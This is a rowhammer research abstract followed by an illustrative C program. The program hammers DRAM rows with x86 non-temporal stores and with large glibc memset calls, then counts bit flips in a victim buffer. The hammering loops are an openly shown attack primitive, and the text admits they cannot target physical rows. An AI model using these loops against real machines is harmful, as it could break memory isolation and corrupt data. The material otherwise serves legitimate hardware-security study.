Rowhammer is a hardware bug in recent commodity DRAM: repeatedly activating a row can cause bit flips in physically adjacent rows. It has been recognized as both a reliability and a security problem, and it is a classic example of layered abstractions and trust (here, the isolation that virtual memory promises) being broken from the hardware level. Previous rowhammer attacks rely either on rarely used special instructions or on complicated memory access patterns. In this paper we propose a new approach to rowhammer based on x86 non-temporal instructions. This approach bypasses existing rowhammer defenses and is much less constrained, which makes it suitable for a more challenging task: remote rowhammer attacks, i.e., triggering rowhammer through existing, benign code. We further extend the approach and identify the libc memset and memcpy functions as a new rowhammer primitive. Our discussion of rowhammer protection suggests that understanding this new threat is critical for defending in depth.
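The two access patterns the abstract describes, as an added illustration that is not code from the paper: a hammer loop built from x86 non-temporal stores (`movnti` via the `_mm_stream_si64` intrinsic), and the same effect obtained through plain `memset` calls. The rationale in the comments (non-temporal stores write around the cache through the write-combining buffer, so the row is re-activated without any `clflush`; glibc's x86-64 `memset`/`memcpy` switch to non-temporal stores above an internal, version-dependent length threshold) is general x86/glibc knowledge, not a claim taken from the page. The buffer size, iteration counts and the `MEMSET_LEN` value are assumptions for illustration. The program only reproduces the access pattern: a user-space process cannot choose which physical rows its buffers land on, so the aggressor/victim buffers here are merely heap allocations and a flip count of zero is the expected result on a healthy machine; the checker function is what a practitioner would keep to verify a victim region after a hammering run. On non-x86 targets the non-temporal store degrades to a plain volatile store so the program still compiles.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#if defined(__x86_64__)
#include <immintrin.h>
#define HAVE_NT_STORES 1
#else
#define HAVE_NT_STORES 0
#endif

/* Illustrative sizes (assumptions, not from the paper). MEMSET_LEN must exceed
   glibc's non-temporal threshold for memset to actually emit streaming stores;
   that threshold depends on the libc version and cache size. */
#define AGGRESSOR_WORDS (4096 / sizeof(uint64_t))   /* one page per aggressor */
#define MEMSET_LEN      (8u * 1024u * 1024u)       /* 8 MiB per memset call */
#define FILL_PATTERN    0x5555555555555555ULL

/* One non-temporal 64-bit store (movnti). It bypasses the cache hierarchy and
   reaches DRAM through the write-combining buffer, so the row is activated
   again on every iteration without any clflush in the instruction stream. */
static inline void nt_store64(uint64_t *p, uint64_t v) {
#if HAVE_NT_STORES
    _mm_stream_si64((long long *)p, (long long)v);
#else
    *(volatile uint64_t *)p = v;   /* portability fallback: an ordinary cached store */
#endif
}

/* sfence drains the write-combining buffer so the pending stores are pushed
   to memory now instead of being combined with the next iteration's stores. */
static inline void drain_wc(void) {
#if HAVE_NT_STORES
    _mm_sfence();
#endif
}

/* Alternate non-temporal stores between two aggressor addresses.
   Returns the number of stores issued. */
uint64_t hammer_nt(uint64_t *agg1, uint64_t *agg2, uint64_t iters) {
    uint64_t n = 0;
    for (uint64_t i = 0; i < iters; i++) {
        nt_store64(agg1, i);
        nt_store64(agg2, ~i);
        drain_wc();
        n += 2;
    }
    return n;
}

/* The libc primitive: large memset calls on two buffers. With glibc on x86-64,
   lengths above the non-temporal threshold are written with streaming stores,
   so benign code (no clflush, no intrinsics) produces the same DRAM traffic.
   Returns the number of memset calls issued. */
uint64_t hammer_memset(void *buf1, void *buf2, size_t len, uint64_t iters) {
    uint64_t n = 0;
    for (uint64_t i = 0; i < iters; i++) {
        memset(buf1, (int)(i & 0xff), len);
        memset(buf2, (int)(~i & 0xff), len);
        n += 2;
    }
    return n;
}

/* Post-hammer check: count bits in a victim region that no longer match the
   pattern it was filled with. */
uint64_t count_bit_flips(const uint64_t *victim, size_t words, uint64_t pattern) {
    uint64_t flips = 0;
    for (size_t i = 0; i < words; i++)
        flips += (uint64_t)__builtin_popcountll(victim[i] ^ pattern);
    return flips;
}

int main(void) {
    uint64_t *agg1 = malloc(AGGRESSOR_WORDS * sizeof(uint64_t));
    uint64_t *agg2 = malloc(AGGRESSOR_WORDS * sizeof(uint64_t));
    uint64_t *victim = malloc(AGGRESSOR_WORDS * sizeof(uint64_t));
    unsigned char *big1 = malloc(MEMSET_LEN);
    unsigned char *big2 = malloc(MEMSET_LEN);
    if (!agg1 || !agg2 || !victim || !big1 || !big2) return 1;

    for (size_t i = 0; i < AGGRESSOR_WORDS; i++) victim[i] = FILL_PATTERN;

    uint64_t stores = hammer_nt(agg1, agg2, 2000000);
    uint64_t calls  = hammer_memset(big1, big2, MEMSET_LEN, 200);
    uint64_t flips  = count_bit_flips(victim, AGGRESSOR_WORDS, FILL_PATTERN);
    printf("nt stores=%llu memset calls=%llu victim bit flips=%llu\n",
           (unsigned long long)stores, (unsigned long long)calls,
           (unsigned long long)flips);

    free(agg1); free(agg2); free(victim); free(big1); free(big2);
    return 0;
}
```

To confirm that a given glibc really emits streaming stores for `MEMSET_LEN`, step through `memset` in a debugger or disassemble the selected `memset` variant and look for `movnt*` instructions; if the length is below the threshold the call is an ordinary cached write and will not hammer anything.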